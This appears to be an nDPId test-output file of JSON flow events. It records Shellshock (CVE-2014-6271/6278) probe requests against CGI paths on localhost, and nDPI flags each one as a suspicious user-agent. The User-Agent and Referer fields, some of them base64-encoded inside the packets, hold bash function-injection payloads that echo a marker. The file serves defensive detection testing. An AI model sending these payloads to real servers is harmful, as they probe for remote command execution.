00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_packet_id":1,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277459,"pkt":"AAAAAAAAAAAAAAAACABFAAEMfPpAAEAGvu9\/AAABfwAAAcVuH5CbL0QudOlGT4AYAED\/AAAAAQEICp1m\/fudZv37R0VUIC90ZXN0X2NnaS5wbCBIVFRQLzEuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":490,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277459,"flow_last_seen":1576420277459,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277459,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50542,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test_cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_packet_id":1,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277460,"pkt":"AAAAAAAAAAAAAAAACABFAAEMyD1AAEAGc6x\/AAABfwAAAcVwH5BPvfDvcLTsqIAYAED\/AAAAAQEICp1m\/fydZv38R0VUIC90ZXN0LWNnaS5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":491,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277460,"flow_last_seen":1576420277460,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277460,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50544,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test-cgi.pl","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277462,"pkt":"AAAAAAAAAAAAAAAACABFAAEIoLlAAEAGmzR\/AAABfwAAAcVyH5A1vJhjWIrHxIAYAED+\/AAAAQEICp1m\/f2dZv39R0VUIC90ZXN0LnB5IEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":492,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277462,"flow_last_seen":1576420277462,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277462,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50546,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.py","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_packet_id":1,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277463,"pkt":"AAAAAAAAAAAAAAAACABFAAEILLBAAEAGDz5\/AAABfwAAAcV0H5AN6xR8l7l+o4AYAED+\/AAAAQEICp1m\/f+dZv3+R0VUIC90ZXN0LnNoIEhUVFAvMS4xDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":493,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":493,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277463,"flow_last_seen":1576420277463,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277463,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/test.sh","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_packet_id":1,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277464,"pkt":"AAAAAAAAAAAAAAAACABFAAEOUvlAAEAG6O5\/AAABfwAAAcV2H5BXVWoitNrsWoAYAED\/AgAAAQEICp1m\/gCdZv4AR0VUIC90bVVuYmxvY2suY2dpIEhUVFAvMS4xDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":494,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":494,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277464,"flow_last_seen":1576420277464,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tmUnblock.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_packet_id":1,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277465,"pkt":"AAAAAAAAAAAAAAAACABFAAEKgUVAAEAGuqZ\/AAABfwAAAcV4H5AZ0bmWzQ36cYAYAED+\/gAAAQEICp1m\/gGdZv4BR0VUIC91bmFtZS5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":495,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277465,"flow_last_seen":1576420277465,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277465,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uname.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_packet_id":1,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":282,"pkt_l4_len":248,"thread_ts_msec":1576420277466,"pkt":"AAAAAAAAAAAAAAAACABFAAEM2vpAAEAGYO9\/AAABfwAAAcV6H5AtBOIv4uMLlYAYAED\/AAAAAQEICp1m\/gKdZv4CR0VUIC92aWV3Y3ZzLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":496,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277466,"flow_last_seen":1576420277466,"flow_idle_time":7580000,"flow_min_l4_payload_len":216,"flow_max_l4_payload_len":216,"flow_tot_l4_payload_len":216,"midstream":1,"thread_ts_msec":1576420277466,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/viewcvs.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00764{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277467,"pkt":"AAAAAAAAAAAAAAAACABFAAEITytAAEAG7MJ\/AAABfwAAAcV8H5BFlnf\/97sS7IAYAED+\/AAAAQEICp1m\/gOdZv4DR0VUIC93ZWxjb21lIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":497,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":497,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277467,"flow_last_seen":1576420277467,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277467,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/welcome","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277469,"pkt":"AAAAAAAAAAAAAAAACABFAAEK4AFAAEAGW+p\/AAABfwAAAcV+H5B29+cpQb7It4AYAED+\/gAAAQEICp1m\/gWdZv4FR0VUIC93aG9pcy5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="}
01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":498,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277469,"flow_last_seen":1576420277469,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277469,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/whois.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00755{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_packet_id":1,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":271,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":271,"pkt_l4_len":237,"thread_ts_msec":1576420277471,"pkt":"AAAAAAAAAAAAAAAACABFAAEB0rpAAEAGaTp\/AAABfwAAAcWAH5AE8+pw+\/3ZB4AYAED+9QAAAQEICp1m\/gedZv4HR0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
01153{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":499,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":499,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277471,"flow_last_seen":1576420277471,"flow_idle_time":7580000,"flow_min_l4_payload_len":205,"flow_max_l4_payload_len":205,"flow_tot_l4_payload_len":205,"midstream":1,"thread_ts_msec":1576420277471,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
